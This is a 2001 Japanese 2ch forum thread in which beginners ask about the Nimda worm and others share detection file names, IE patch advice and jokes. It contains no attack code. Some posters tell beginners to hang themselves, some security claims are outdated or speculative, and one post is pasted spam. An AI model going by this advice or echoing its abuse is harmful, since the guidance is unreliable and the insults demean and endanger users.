1 :
初心者。 :
01/09/19 11:47 ID:7z8g0MW6 専門用語飛び交いすぎです。 「・・・・のワクチン、買っていれとけ!!!」とか、 初心者でも出来る対策を簡単な言葉で教えていただけたらと・・・。
2 :
:01/09/19 11:48 ID:spzt.8VY
感染ファイルってどうやって検索すればいいの?
3 :
4 :01/09/19 11:48 ID:O9eDUWM2
よろしく
4 :
:01/09/19 11:51 ID:Z1402CAA
5 :
名無し :01/09/19 11:51 ID:F6UjzOVw
感染していないなーと思ったらSP2をダウンロード すればよい。感染してるなーと思ったら回線切ってそ れで首つろうYO!
6 :
:01/09/19 11:53 ID:oestFoJ6
IE5.5なら大丈夫だよね? 他のサイト見に行っても大丈夫?
7 :
:01/09/19 11:54 ID:dEiwDa16
sage
初心者はパソコンの電源切って、 おとなしく寝ててください
9 :
:01/09/19 11:56 ID:998nd5BY
世知辛い世の中だね。
10 :
:01/09/19 11:58 ID:muRQhq5k
小難しくてわかんねーからもっと 丁寧に教えやがれ、という趣旨のスレを立てる1
11 :
! :01/09/19 11:58 ID:7z8g0MW6
ノートンのワクチン入れとけば大丈夫ですよね。
12 :
:01/09/19 11:59 ID:7lDs22Ws
hotmailのサイトは?
13 :
:01/09/19 11:59 ID:dEiwDa16
>>5 聞く前にトップに書いてあるリンクの情報を読もうとは思わないのかい?
14 :
こぴぺ :01/09/19 12:00 ID:XL1ZIYFM
W32.Nimda.A@mm、とりあえずの対策(気休め) ・まず感染の確認 その1:readme.exeやreadme.eml、MEP*.TMP.EXEで検索をかける(ローカルハードドライブを選択すること) なお、readme.exeでWAVファイルみたいになっているものもワーム。 また、OutlookExpress系のメーラーでは送受信メールの拡張子が*.emlなので、 emlが出たからと言って必ずしも感染しているとは限らない。 その2:Cドライブがネットワーク共有を勝手にされていたら感染している その3:システムがスローダウン、いつもよりも明らかに遅く、しかもやたらネットにアクセスしまくる場合も感染している疑い濃厚。 ・対処法 現在のところ不明。 感染ファイルを削除しても、既に正当なWindows DLLとRICHED20.DLLを置き換えているのでムダ。 また、感染後にIE5.5SP2などにしても意味なし。 ・感染している場合 レジストリの \HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths 以下にある実行ファイルに感染している。 ・自己防衛法 IE5.5SP1かSP2にバージョンアップする(ただしダウンロードに非常に時間がかかる) JavaScriptをOFFにしておく(直接リンクしてしまった場合はやはり実行されてしまうので注意) あやしげなメールが来ても開かない(README.EXEという添付ファイルは絶対にクリックしない) 駆除ツールを使う(まだ出てない…) NetscapeNavigatorにする(何か間違ってる…)
15 :
:01/09/19 12:02 ID:P6/AedFA
16 :
初心者 :01/09/19 12:02 ID:exibgqlk
自分が借りてるWebサーバの自分のページが大丈夫かどうかは、 どうやって確認するんでしょうか。
17 :
:01/09/19 12:04 ID:73CIJZGY
IE5.0、5,5って無縁の話されてもなあ。 それよりIE4.0で感染するのかどうか知りたいんだけど。
18 :
! :01/09/19 12:09 ID:3/bSVvek
>>13 読んだってわからないんじゃないか。
あんたのいうことはもっともだが。
>>17 Microsoft ではもう確認もせず、情報も出さない惧れあり。
善意で検証してくれる人がいないと分かりません。
#時間と機材があれば、自分でやるのは難しくないのですが…
20 :
名無しさん :01/09/19 12:10 ID:7lDs22Ws
hotmailって、MSNだけど行ったらやばいのかな?
21 :
初心者さんへ :01/09/19 12:11 ID:3/bSVvek
パソコン屋へいったら? 金はとられるが、それが一番確実。
22 :
:01/09/19 12:12 ID:yMcYQ9GQ
本スレ読んでてもわからないなら、 ネットつながない方がいいだろ。
23 :
:01/09/19 12:15 ID:WTghJb5I
検索したら10000個のファイルが見つかりましたって出たぞ そしてもう一度検索してみたら0個だった どゆこと???
頒布←これなんて読むの?
25 :
. :01/09/19 12:16 ID:5i4BbajE
漏れの友人も大騒ぎしてる 自分で調べもせずに次から次へと・・・ 分からないからって逆切れすんなよ( ゚Д゚)ゴルァ! ウイルス定義の更新すらしてないような厨房はネット繋ぐな、迷惑だ。
26 :
:01/09/19 12:18 ID:/8K9yolQ
>>24 >頒布←これなんて読むの?
読み方はフブじゃないの?
たくさん複製して世間に広く分け与えることじゃないの?
27 :
. :01/09/19 12:18 ID:5i4BbajE
28 :
:01/09/19 12:22 ID:/8K9yolQ
29 :
ななし :01/09/19 12:23 ID:LlIGXruA
ネットスケープの4.7使ってるんだけど、これは平気なの?
30 :
:01/09/19 12:25 ID:zBOpeQC.
初心者質問スマソ なんでMSNウィルスって呼ばれてるの? MSNが感染に荷担したの?
31 :
:01/09/19 12:26 ID:.xGaQ9lU
MSNのトップがやられたから
32 :
結論としては・・・・ :01/09/19 12:26 ID:3/bSVvek
ワクチンを買ってインストールせよ。
33 :
:01/09/19 12:27 ID:Davx2OCk
私自身に危険はないんでしょうか? そういえば、頭が重い気がします。 病院に逝くべきでしょうか
34 :
まじで厨房に語りたい。小一時間語り詰めたい :01/09/19 12:28 ID:RpkGMlcw
W32.Nimda.A@mm、とりあえずの対策(必要条件) 2ちゃんなんて見てないで、皆のためにも とっとと回線切って首吊れ
35 :
:01/09/19 12:29 ID:spzt.8VY
つーかお前ら割れ使ってるからファイル更新出来ないだろ プ
36 :
ド素人 :01/09/19 12:30 ID:AGkf8kDY
意味わからん
37 :
:01/09/19 12:31 ID:0C89g52A
38 :
_ :01/09/19 12:33 ID:o1Xmk.Yk
SP2とかってどこで見るのよ? 俺のIE5.5は「バージョン:5.50.4134.0600」ってなってるけど、 これは大丈夫な奴なのかい?
39 :
:01/09/19 12:34 ID:Dhsl8eBY
わかんないからおしえて
40 :
:01/09/19 12:34 ID:xEhJdrQw
よくわからんのやったらデータセーブして再インストール 後に雑誌に付いてるCD-ROMでアップグレード
41 :
おひ「 :01/09/19 12:36 ID:rydEHM7E
更新バージョン:SP2 ってなってればSP2
42 :
38 :01/09/19 12:37 ID:o1Xmk.Yk
43 :
:01/09/19 12:37 ID:H2D68rEQ
ニュースサイトは、安全IEなバージョンを報道するのみで ワームの動作を防止するためのJavaScriptを切るなどの対処法を 全く説明しないゾ。 やはりウェブ系報道機関は、他の報道機関が報じた記事や 当事者の公式発表をコピペして垂れ流すだけか。
44 :
:01/09/19 12:38 ID:spzt.8VY
IE5.00ってやばいすか? SP2って書いてあるんすけど
45 :
:01/09/19 12:41 ID:qpXKNfss
どいつもこいつもエロサイト行って勉強してこい。 って思った。 1回eroxにでも泣かされて来い。
46 :
:01/09/19 12:42 ID:/yUtihZs
5.5SP2やっとDL完了・・30分かかったよん
47 :
:01/09/19 12:42 ID:4p3db42g
ワーム=虫ってどういうことですか?
48 :
:01/09/19 12:44 ID:xEhJdrQw
マイクロソフトのサポートセンターに電話してください
49 :
:01/09/19 12:45 ID:iOVUc1CA
>46 オレは3時間かかったよ(泣きワラ
50 :
ななし :01/09/19 12:47 ID:LlIGXruA
アップデートしただけなのに、デフォルトのブラウザが ネスケからIEに勝手に変わってた。
51 :
:01/09/19 12:48 ID:zsQE2Q3w
52 :
:01/09/19 12:48 ID:/yUtihZs
5.5SP1でも感染するらしい
53 :
:01/09/19 12:48 ID:MAmLkAiE
どなたか、お教えください。 フリーのタブブラウザを使っているんですが、 Java切っとけば大丈夫なんでしょうか? ちなみに、Moon Browserです。
54 :
:01/09/19 12:48 ID:7jAGOnQE
Dear E-Commerce professional ; This letter was specially selected to be sent to you . If you are not interested in our publications and wish to be removed from our lists, simply do NOT respond and ignore this mail ! This mail is being sent in compliance with Senate bill 2416 , Title 8 , Section 305 . This is not multi-level marketing ! Why work for somebody else when you can become rich within 97 months ! Have you ever noticed the baby boomers are more demanding than their parents and the baby boomers are more demanding than their parents . Well, now is your chance to capitalize on this ! WE will help YOU sell more and process your orders within seconds ! You can begin at absolutely no cost to you ! But don't believe us ! Prof Anderson of Colorado tried us and says "Now I'm rich, Rich, RICH" ! We are licensed to operate in all states . If not for you then for your LOVED ONES - act now ! Sign up a friend and you'll get a discount of 80% ! Best regards !
55 :
マシリト総理 ◆84VbUMtQ :01/09/19 12:49 ID:eKw5kRXU
56 :
あ :01/09/19 12:50 ID:Qs49Ap5g
メモリが少ないのでアプデータできないのですが 2ちゃん以外はどこにもいかなければいいのですか?
57 :
:01/09/19 12:50 ID:xEhJdrQw
すげーなお前ら、よくそんなんで2ちゃんねるなんかこれるな、 どうせファイアーウォールなんかいれてないんだろ、クッキー もOKで情報垂れ流してんだろ、JAVAもきってないんだろ、 もしかしたらこれも何いってるかわからんやついる?
58 :
感染しました :01/09/19 12:50 ID:zKEP5/x6
IE5.5SP2 なんだけど システム全体のスキャンかけたらW32.Nimda.A@mmを検出して削除しました。 とりあえず大丈夫なんだけど原因がわかりません。 考えられる感染原因を教えてください。 マジでマジレスを希望します。
59 :
38 :01/09/19 12:51 ID:o1Xmk.Yk
つーか、ie5setup.exeは落としたけど、 IE5.5SP2自体が実はウィルスだったという可能性もあるから インストールはしないでおくよ。
60 :
:01/09/19 12:51 ID:ZGnsXA6c
61 :
:01/09/19 12:51 ID:5YeAXAIU
62 :
え :01/09/19 12:52 ID:R2YEcb/2
ニュース版の上のリンクSP1やんけ
63 :
:01/09/19 12:52 ID:s3PsnOCQ
64 :
:01/09/19 12:52 ID:UjD89gUM
65 :
名無しさん :01/09/19 12:53 ID:70l4IFsk
>>57 javaとjavascriptの区別ついてねーだろ
66 :
ふ :01/09/19 12:54 ID:7IoR6iQE
>もしかしたらこれも何いってるかわからんやついる? 言ってる事は判るけど面倒で何もやってねぇ。 やべーかな、やっぱ・・・。
67 :
名無しさん@お腹いっぱい。 :01/09/19 12:54 ID:uwpoRi5M
>>58 感染経路が複数あります、IE5.5SP2は感染サイトを参照しても自動的に感染しないというだけです。
共有ドライブがある、IISを導入している・・・・
OSの種類やバージョンを書いてみれ。
68 :
:01/09/19 12:55 ID:/yUtihZs
東スポではこのウィルスもラディンのせいにしているよ(藁
69 :
:01/09/19 12:55 ID:drzf/ris
70 :
:01/09/19 12:55 ID:0JDuiGy.
71 :
58だけど :01/09/19 12:56 ID:zKEP5/x6
マジの話なんだよ。 原因がわからん。 誰か教えて。
72 :
:01/09/19 12:56 ID:/yUtihZs
ファイヤーウォールまんせ〜〜!(ゲラ
73 :
:01/09/19 12:57 ID:zvPGo23.
東スポはPCではなく、記者の頭にウィルスが感染したようだな。 ま、売るためだ。煽りは藁ってすまそう。
74 :
NeWS SITEs ◆NeWSITEs :01/09/19 12:58 ID:JSlZ/h2Q
75 :
:01/09/19 12:59 ID:muRQhq5k
(´ー`)。oO(ウィルス怖いね)
76 :
NeWS SITEs ◆NeWSITEs :01/09/19 13:00 ID:JSlZ/h2Q
>>57 ファイアーウォールいれてればいいんですか?
クッキーって情報垂れ流すんですか?
状況報告ver1.02(前編) 対策 1.IE5.01とIE5.5はSP2以外無条件でDL実行してしまうので、感染前ならアップデートする 2.それでもダイアログは開くので、覚えのないファイルはDLしない。 3.ツール→インターネットオプション→セキュリティ→レベルのカスタマイズ →java関連とダウンロードのファイルのダウンロードを不許可。 現在わかっている影響 1.メールによるウイルスファイルの頒布 2.WEBコンテンツ閲覧時にそのサーバにウイルスパケットを送り攻撃、感染する。 3.バックドアを開き、クライアントを丸裸にする。 4.大量の*.emlファイルを量産する。 5.感染したPCはCドライブをネットワーク共有する。 6.システムのスローダウン 7.リソースの消耗 8.他のファイルに潜伏する。 メールによる接触時 ウィルス感染したメールを受信したとき、readme.exe はwav(音声)ファイルになりすます。 LANによる感染 社内に一人でも対策してないひとがいてノーパスとかにしていた場合 LANの共有フォルダを使っても自己増殖する。
78 :
量産型ラディン :01/09/19 13:08 ID:39GVbFRk
東スポ曰く、 このウイルスはラディンが仕掛けた物でコンピュータを狂わせて核ミサイルを発射させる事も可能。 このウイルスは第3次世界大戦の幕開けだ。 ラディン達は世界中のコンピュータを自由に操る事が出来ると言うのか。 …らしいです。 ま、いっかぁ東スポだし。
79 :
続き :01/09/19 13:09 ID:1L5pANOU
状況報告ver1.02(後編)
感染の有無の確認
1.●トレンドマイクロ オンラインスキャン
http://housecall.antivirus.com/housecall/start_jp.asp 2.『*.eml』『readme.exe』『MEP51B3.TMP.EXE』の検索でHIT
*.emlが大量にHITした際は確定。
ただし、それが以前に自分の書いた見覚えのあるメールだったら、
それはウイルスではない。
そうでないときは後者2個を削除して様子を見る。
ファイルのDLを拒否してもファイルが作成されたという報告があるので、
危険ブラウザでない人もファイルのDLを不許可にした方がいい。
3.『mep』で検索した際に『mep????.tmp』がHITする。
感染時の対応
感染してしまった後は、アップデートしても無意味。
とりあえず検索で引っかかったファイルを削除した後、感染を拡大しないように
ウイルス対応ソフトのHP以外には行かず、ワクチンが出来るまで他のWEBコンテン
ツを回らない。
ワクチンできたよとかの情報など、追加のフォローさらに宜しく!>ALL
80 :
26 :01/09/19 13:10 ID:6OZWLuBo
>>24 私、間違えていた。
はんぷ 【頒布】
(名)スル
配って広く行きわたらせること。「小冊子を―する」
81 :
:01/09/19 13:11 ID:f5xqJD/.
82 :
:01/09/19 13:13 ID:6OZWLuBo
>>61 >色々アップデートしたら、
>アドレスの
http://の左側にあるマーク (紙の上にeの文字)
>の色が水色っぽく変わった
>みんなもそうなの?
InternetExproler6の特徴だよ。
83 :
:01/09/19 13:14 ID:muRQhq5k
クッキーてそんなやばいのか? 2chに書けないからオンにしてるんだけど
84 :
名も無きDCネッター :01/09/19 13:15 ID:81fajNg6
あのぉ、、、 ドリームキャストは感染しませんよね? 少し心配です。
85 :
:01/09/19 13:15 ID:kUOVpNis
なんだか、よくわからないから2chから外にでないように してよっと
86 :
:01/09/19 13:17 ID:jQA0jqGc
漏れザウルスだけど感染しそうで怖い!
87 :
:01/09/19 13:19 ID:1L5pANOU
>>84 ドリキャスは、性能がアレな代わりにウイルスには強いよ。
なんせまともな記憶媒体が内部RAMとVMしかないから……
OSすら起動のたびにGDから読み取りだし
88 :
名も無きDCネッター :01/09/19 13:21 ID:81fajNg6
>>87 ありがとうございます。
安心しました。
ドリキャスマンセー!
(半角カタカナ打てません)
89 :
:01/09/19 13:21 ID:xEhJdrQw
>>83 ZDNNでcookie、悪用で検索してみ あとウェブバグも
でもあそこはソフトバンクだからそれで儲けてる側で
ちょっとしか取りあげてないけど
90 :
:01/09/19 13:24 ID:zsQE2Q3w
91 :
NeWS SITEs ◆NeWSITEs :01/09/19 13:24 ID:JSlZ/h2Q
16日に中国からのウイルス攻撃は予想されていたんですね。
92 :
:01/09/19 13:26 ID:xEhJdrQw
あとここのページもウェブバグが検出されてて
どうやら追跡されてるようです
Bugnosis analysis of: ニュース速報@2ch掲示板 (
http://news.2ch.net/news/#5 )
Highlighted images may be Web bugs.
Properties Contact Image URL
Tiny, Once, Domain
http://f1.aaacafe.ne.jp/~starplan/newsrogo.gif Property name Description
--------------------------------------------------------------------------------
Tiny image is tiny, so is probably not meant to be seen
Protocols image URL contains more than one Web protocol name (e.g., "http:" twice)
Cookie image URL overlaps with the cookie field too much
Lengthy image URL is unusually long
Domain image comes from a different domain than the main document
Once image is used only once in the document
TPCookie image comes from a different domain than the document and manipulates a cookie (Third Party Cookie)
Recognized compares the URL against a set of recognized Web sites
--------------------------------------------------------------------------------
Copyright © 2000, 2001 Privacy Foundation. All rights reserved.
Right-click in this window to configure Bugnosis.
Help / Readme File (on this computer)
Bugnosis Web site
93 :
だれかー_さすけ_てー :01/09/19 13:26 ID:dEIFz/4k
きゃはは ネットはブッ壊れてもいいパソコンでやってたからいいかも ってかファイルとか消えないなら問題無いや
94 :
:01/09/19 13:28 ID:6OZWLuBo
95 :
ラディン第三形態 :01/09/19 13:29 ID:8pBkGXJQ
つーか、東スポ煽りすぎ(w あの記事見たら素人は滅茶苦茶ビビるぞ(w
96 :
はて? :01/09/19 13:30 ID:oaR/VUnY
よくわからんが、 >2.WEBコンテンツ閲覧時にそのサーバにウイルスパケットを送り攻撃、感染する。 ちゅうことなら、2chのサーバもやばいんでは? 2chだけみてれば安心、というわけにはいかないのでは?
97 :
:01/09/19 13:32 ID:4r89trDc
僕のPC内のエロ画像もラディンに見られちゃいますか?
98 :
:01/09/19 13:34 ID:1L5pANOU
>>96 対策がちゃんとしている鯖は安心だけど
とりあえずウイルスの中身がまだ完全にわかっていないようなので
ここも過信はしない方がいいと思う
99 :
:01/09/19 13:35 ID:ALUfLgrg
スーパーピンチ
100 :
:01/09/19 13:36 ID:TUtUByPw
AAずれますよね?5.5 6.0は
101 :
:01/09/19 13:36 ID:oaR/VUnY
>>98 2chみるにしても、IE5.5 sp2かIE6にしておけ!!
っちゅうことですかね?
102 :
:01/09/19 13:38 ID:oaR/VUnY
そういえば、IE6の最新バージョンってどっかの雑誌の付録にもうついてます? ネットから落とすとウン時間かかりそうなので・・・
103 :
:01/09/19 13:38 ID:ALUfLgrg
5.1のSP2ならAAずれねぇし安全だぜ。多分。
104 :
:01/09/19 13:38 ID:Gmx2gDPs
IEからネスケに乗り換えれば安全なの?
105 :
:01/09/19 13:40 ID:LvaoUGzc
>>101 それ以外は即逝く
あと、JavaScriptもきっといたほうが良いね。
106 :
初心者1号 :01/09/19 13:41 ID:zsQE2Q3w
>>100 僕、今さっき5.5のSP2にしたんだけど
ずれないんだよね、、、なんでだろ?
ちなみに、かちゅ〜しゃで見てます。
107 :
:01/09/19 13:42 ID:6OZWLuBo
>>102 IE6の正式版が出たというデマが
ニュース速報板で数日前に流れたけれども
現在もテストバージョンしか出ていないので
サーバーからダウンロードするしかない。
108 :
ぷ :01/09/19 13:42 ID:A2birs9c
MAC使ってるよ。 ウイルスうらやましい。
109 :
:01/09/19 13:42 ID:LvaoUGzc
>>104 おれはネスケのことは、ようしらんが、
大丈夫みたいYO
110 :
:01/09/19 13:43 ID:6OZWLuBo
>>104 >IEからネスケに乗り換えれば安全なの?
2ちゃんの話によるとそうらしいね。
でも、本当かどうか知らない。
111 :
:01/09/19 13:43 ID:LvaoUGzc
112 :
:01/09/19 13:44 ID:JSlZ/h2Q
>>108 昔は MAC のウイルスって結構あったけど、いまはウイルスあっても流通させるマシンがないよね。
113 :
:01/09/19 13:45 ID:JSlZ/h2Q
114 :
:01/09/19 13:45 ID:LvaoUGzc
>>110 ただ、メールで送られてきたり、職場などの、
ネットワークで送られてきたら、対応しようがない。
115 :
_ :01/09/19 13:45 ID:t5ePDc5w
116 :
:01/09/19 13:45 ID:oaR/VUnY
ここまできたらはづかしついでにききます。 JavaScript切るのって、 「セキュリティ」「レベルのカスタマイズ」「セキュリティの設定」の 「Javaアプレットのスクリプト」を無効にすればいいんだよね? JavaアプレットのスクリプトってJavaScriptとは実は違うもののような気が してならないんだけど・・・
117 :
:01/09/19 13:46 ID:1L5pANOU
>>104 寝輔でも即死しないだけで、直リンでファイル踏まされると
DLダイアログは出るはずだからちゃんと拒否してねん
118 :
:01/09/19 13:46 ID:JSlZ/h2Q
Nimdaを逆さから読むと、admin。 adiminからadministratorという言葉が容易に連想できる。 administratorとは、管理者。 このことから、感染したPCをウイルス開発者が管理するスクリプトがウイルスに含まれている事は明白である。
AAずれる人は ツール->インタネットオプション->全般->フォント->Webページフォント これをMS PゴシックからMS ゴシックに変更して
121 :
:01/09/19 13:49 ID:OO3wQbOI
122 :
素人 :01/09/19 13:49 ID:6bKYUMSc
>>116 違うよ。
この際だから、両方オフでね。
ついでにダウンロードも無効にしておきましょう
123 :
:01/09/19 13:49 ID:LvaoUGzc
>>113 かちゅしゃはよくわかんねぇYO!!
ブラウザが開くの?
124 :
ioi :01/09/19 13:49 ID:y6NgI00I
admin 2 3w
125 :
:01/09/19 13:49 ID:bCsgO3Gg
東スポを今から買ってくるよ
126 :
:01/09/19 13:50 ID:1L5pANOU
>>116 超初心者向けで作ったから、JAVAとjavaの違い説明するの面倒だったのよ。
>>96 > ちゅうことなら、2chのサーバもやばいんでは?
さすがに Windows をサーバーに使ってはいないでしょう
から、2ch に感染ということはなさそう。
128 :
:01/09/19 13:51 ID:cBk407FU
まとめてくれ!
129 :
:01/09/19 13:52 ID:/.OemXTo
130 :
:01/09/19 13:53 ID:7MPHSOfA
IE5.0SP2 は危険かな?
131 :
:01/09/19 13:54 ID:JSlZ/h2Q
>>129 Windows UPDATE や、 IE6のダウンロードファイルに、なにか仕掛けがあったらスゴいけど
132 :
:01/09/19 13:54 ID:oaR/VUnY
>>112 どうも。
ということは、その下の
「アクティブスクリプト」と「スクリプトの貼り付け処理の許可」
かな?
ダウンロードは「ファイルのダウンロード」だってのはわかりました。
133 :
:01/09/19 13:54 ID:1L5pANOU
>>130 即死は無し。
だけど覚えの無いDLダイアログが開くことあるからそれを拒否して。
>>130 問題なしです。
もし前のほうのスレでワシの書き込みを読んで判断されてるようなら申し訳ない。
135 :
:01/09/19 13:55 ID:IVqXYvyw
ネスケなら問題ないんですか?
136 :
:01/09/19 13:56 ID:OVdoWqpg
SP2のインストールが途中で止まったりして上手く行かない人へ 1.最小構成インストール、又はブラウザのカスタマイズ(C) を選ぶ。 2.次の画面の右下のボタン「詳細設定」を押して、「ダウンロードのみ」 を選ぶ。 3.ダウンロードが終わったら、すぐにインストールせずに、 PCをセーフモードで再起動 4.セーフモードで起動した状態でインストール これでインストールできます。
137 :
¥ :01/09/19 13:57 ID:t5ePDc5w
リロードすると訳のわからない文字が出てくるのですが・・・
138 :
:01/09/19 13:58 ID:7MPHSOfA
>>133 >>134 有難う御座います 気をつけます!
あと申し訳なくないです
前の方のスレ読んで色々チェックしたりできたので
とても感謝してます〜
139 :
:01/09/19 13:58 ID:1Nv4PlFc
てすと
>>137 メニューバーの「表示」→「エンコード」以下で「日本語(自動認識)」が選択されてる?
141 :
林檎の嘆き :01/09/19 13:58 ID:XLpArY/.
なんか仲間外れにされた気分・・・・・・
142 :
:01/09/19 13:59 ID:7X3k5Gy6
テロ募金のクリックしたらおみやげもらっちゃいました 打つだし脳
143 :
:01/09/19 13:59 ID:1Nv4PlFc
てすと
144 :
:01/09/19 13:59 ID:6Y135P7o
ところでひろゆき顔出さないけど なんか対応早いな!
145 :
:01/09/19 14:00 ID:1L5pANOU
# 以下初心者の方にはお勧めできない内容です
>>141 VMwareとかを入れて仮想Windowsマシンを作れば擬似的にウイルスに感染させられるぞ。
ただ、使い方を誤ると本来のマシンのほうに影響が及んでしまうかもしれないのと、
ネットワーク上にバラまくと迷惑なので注意。
>>144 2ちゃんねるのWebサーバはapacheなので今回のトラブルとは全く無関係ですよ。
>>140 自動認識になってますが・・・
書き込みが終わった後にも変な文字が・・・
149 :
:01/09/19 14:04 ID:VjkZRXtk
150 :
:01/09/19 14:04 ID:6OZWLuBo
151 :
うほ! :01/09/19 14:05 ID:zsQE2Q3w
nanasisanはこちらにもいらしたんですね! お疲れさまです。がんばってください!
>>148 それってインストールがうまくいっていないのでは?
ちなみにインストールしたIEのバージョンは?
153 :
はあん :01/09/19 14:06 ID:tyUuhn76
よくわからないからIE6をインストールした。 5.5とかあるけど数字が大きい方がいいんでしょ?
154 :
:01/09/19 14:06 ID:1L5pANOU
>>148 そのうちいきなり直ったり、再起動後に直ってたりするから、
面倒でもエンコード→日本語(自動選択)の方で我慢
>>145 146の方法でおいらも感染してみるよ!
HDDを分けっこして、macdowsマシン誕生!!
156 :
129 :01/09/19 14:08 ID:3AnOZHiA
>>150 あんたそんなカキコ信じてどうするよ。
そんなんじゃ2ch生きていけないぞ。
それからもっと下の方まで読んでくれ。
157 :
:01/09/19 14:10 ID:ljeMpPVA
msnなんてみてるのは初心者かDQNの証拠。 設定の仕方を知らないだけ。 あんな、偏った編集方針のHPを喜んでみているヤツは国賊。
158 :
:01/09/19 14:10 ID:p2sAn732
>>136 ありがとーありがトー多謝です。
今日一日があなたにとって幸せでありますように
159 :
:01/09/19 14:10 ID:KVCCudAA
160 :
:01/09/19 14:12 ID:lmu1o5BA
161 :
てろりん :01/09/19 14:13 ID:YO8.LQOA
おしえてくださ〜い!! CドライブをWAVで検索したらWAVが出てきたんだけど、これって感染してますか? よろしくお願いします!!
162 :
厨房 :01/09/19 14:14 ID:I3H4ktQc
>>157 WindowsユーザーならIEでMSNが常識だ!!
百歩譲ってyahoo japan!
163 :
木 :01/09/19 14:14 ID:I6iVryNY
2ちゃんは大丈夫なんかな?
164 :
:01/09/19 14:15 ID:1L5pANOU
>>161 WAVはWINの音声データ形式。
それは見つからん方が珍しいから安心して。
165 :
ななしーさん :01/09/19 14:15 ID:FF9YYw4I
は?
166 :
:01/09/19 14:15 ID:N4U8iOCw
>>162 ブラウザ起動直後にいきなりインターネット上のページが見えてしまうのは、それはそれで不便でない?
俺だけかな、lynxでもw3mでもmozillaでもIEでもホームページをブランクページにしてるのは(^^;
俺のIDがFF9だ!
169 :
:01/09/19 14:17 ID:0hSV8Kps
msnなんて行ったことないかも・・ 何なの?検索エンジン?
170 :
厨房 :01/09/19 14:18 ID:I3H4ktQc
171 :
:01/09/19 14:18 ID:N4U8iOCw
172 :
:01/09/19 14:18 ID:EW1aIbKA
IE6って5.5よりもかなり重いんですか? 非力なパソコンなんでそれが心配。
173 :
:01/09/19 14:20 ID:OVdoWqpg
>>169 "Microsoft Network" の略。IEではデフォルトのページがmsnになっている。
>>172 5.5とは大して違わないと思う。機能的にもあまり変わってないし。
175 :
msn厨房 逝ってよし :01/09/19 14:21 ID:3sY7l68o
176 :
:01/09/19 14:21 ID:1L5pANOU
今回のウイルスはIEがMSNのHPとセット商法みたいなことしてたせいで 被害の拡大がひどすぎるなやぁ……
>>152 再インストールしたら解決しました。ありがとうございました。
178 :
厨房 :01/09/19 14:21 ID:I3H4ktQc
>>169 なに!!!!
貴様はネットスケープナビゲーターの工作員だな!!!
MSNを知らないなんて、厨房認定!
回線切って、焼くのを失敗したCD-Rを投げて遊べ!!
179 :
:01/09/19 14:21 ID:Gmx2gDPs
180 :
てろりん :01/09/19 14:21 ID:YO8.LQOA
>>164 、
>>166 そうですか、安心しました。音声ファイルだったんですね。
ありがとうございました!
181 :
ぷ :01/09/19 14:23 ID:LRxTSLIM
MAC使ってるよ。 僕もみんなとワイワイしたいよ。
182 :
:01/09/19 14:23 ID:f0qDqlGU
水原優君結婚して
183 :
厨房 :01/09/19 14:24 ID:I3H4ktQc
>>181 エミュレ−タ−でマックをwinにしる!!
感染体験(゚д゚)ウマー
184 :
ナナシサソ :01/09/19 14:25 ID:uy8Pfu/w
185 :
:01/09/19 14:26 ID:B378IXbs
ドリキャスはどうなの?
186 :
:01/09/19 14:26 ID:3sY7l68o
>>178 そんなの知らなくていいよ。
この事件でmsnは厨房管理さらけだしたんだから。
どうせ、バグで脆弱だったんだろ。
187 :
:01/09/19 14:26 ID:e04NWwrc
ネスケはマヂで使い物にならん
188 :
:01/09/19 14:27 ID:AgNUQR6A
なんか2chの読み込み重いんだけど こいつの影響もあるのかな
189 :
てろりん :01/09/19 14:27 ID:YO8.LQOA
たびたびすみません・・・。 設定ファイルでWAVEmixっていうのがあるんですが、これは感染しているんでしょうか?
>>185 Dreamcastの人はプログラムが動作できる環境ではないので問題は発生しません。
191 :
NeWS SITEs ◆NeWSITEs :01/09/19 14:28 ID:JSlZ/h2Q
>>174 メーカー製のマシンは、初期ページがメーカー向いています。
192 :
:01/09/19 14:29 ID:1L5pANOU
>>185 ガイシュツ。
200ないスレなんだからとりあえず目を通す努力してくれ。
説明面倒だからとりあえず安心しとき。
193 :
厨房 :01/09/19 14:30 ID:I3H4ktQc
>>191 あなたのレスがデジャブだ・・・
ゴミレスすまん
194 :
:01/09/19 14:31 ID:M9gsgZs2
質問!OSが借り物の場合、ダウンしたらヤバイですか?
>>189 それはウイルスとは無関係。必要なければ消してしまってもかまわないが、
何かのアプリケーション設定が消えてしまうかもしれないので注意。
196 :
:01/09/19 14:33 ID:/LsUGfPI
197 :
:01/09/19 14:33 ID:1L5pANOU
>>189 とりあえずここではWAVEから離れんしゃい。
WAV関連はメールの添付ファイル以外は今回関係ないよ
198 :
:01/09/19 14:33 ID:peq79vYs
で、結局検索でreadme.exeがあったら感染なのか?
199 :
:01/09/19 14:35 ID:N4U8iOCw
200 :
てろりん :01/09/19 14:35 ID:YO8.LQOA
>>195 ありがとう!安心しました〜。
これからもっと勉強をして詳しくなります。お世話さまでした!
201 :
:01/09/19 14:38 ID:1L5pANOU
>>198 キャッシュにあるだけかもしれないから、それで確定じゃないよ。
*.emlが大量にHITしたら確定って考えていいと思う。
202 :
:01/09/19 14:41 ID:peq79vYs
>201 さんくす、2個しか*.emlは見つからなかった 感染はしていないみたいだ
203 :
:01/09/19 14:44 ID:NKuHDtEA
IE5.0、CPUはペンティアム166、メモリ96。 この非力なパソコンにはどのIEを入れればいいですか?
204 :
:01/09/19 14:44 ID:/LsUGfPI
ageだ、ホレ
205 :
どうして?? :01/09/19 14:45 ID:Dllf4gis
SP2をインストール&再起動し、バージョンがSP2になったのに
Temporary Internet Filesを検索したら、
[email protected] というのが出てきました。
これは、まだ感染しているということですか?
206 :
_ :01/09/19 14:45 ID:xHvJLsz6
うちのパソコンにもウイルスいるよ。 名前はVBS.Haptime.A@mmつて奴。 いい感じに共存してるけどそろそろ手を切りたいな〜。 誰か教えてください(泣
